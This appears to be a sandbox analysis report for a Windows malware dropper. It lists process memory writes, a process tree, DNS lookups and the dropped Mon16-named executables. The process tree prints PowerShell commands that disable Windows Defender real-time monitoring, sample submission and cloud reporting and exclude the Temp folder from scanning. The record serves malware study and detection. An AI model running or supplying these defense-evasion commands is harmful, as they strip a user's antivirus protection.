PID 1416 wrote to memory of 444 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3088 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 3752 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 1844 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4668 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 1416 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe

"C:\Users\Admin\AppData\Local\Temp\b592fd0fd3806a9adf968d15624da8d617afe9bc857007ef51efb0e0de8e29fa.exe"

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon166dc6040fb8726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16bd4a93b822a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1661118952.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16b7581baf7.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon167f9db638e4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ad13d7ad1b02.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1618e4439d986270.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon1631358b82299bd8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16d070a064013c841.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16734014a69dec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16737798ac26f984.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon164c5af508c3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16957e622fa390.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16ac385cfd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon16e127a54386dd68.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Mon161bd381a14aea5c.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon161bd381a14aea5c.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zivcm5b1.un4.ps1

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16e127a54386dd68.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16ac385cfd.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16957e622fa390.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon164c5af508c3.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16737798ac26f984.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16734014a69dec.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16d070a064013c841.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon1618e4439d986270.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16ad13d7ad1b02.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon167f9db638e4.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16b7581baf7.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon16bd4a93b822a.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon166dc6040fb8726.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon1631358b82299bd8.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\Mon1661118952.exe

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libstdc++-6.dll

C:\Users\Admin\AppData\Local\Temp\7zS47F3D097\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
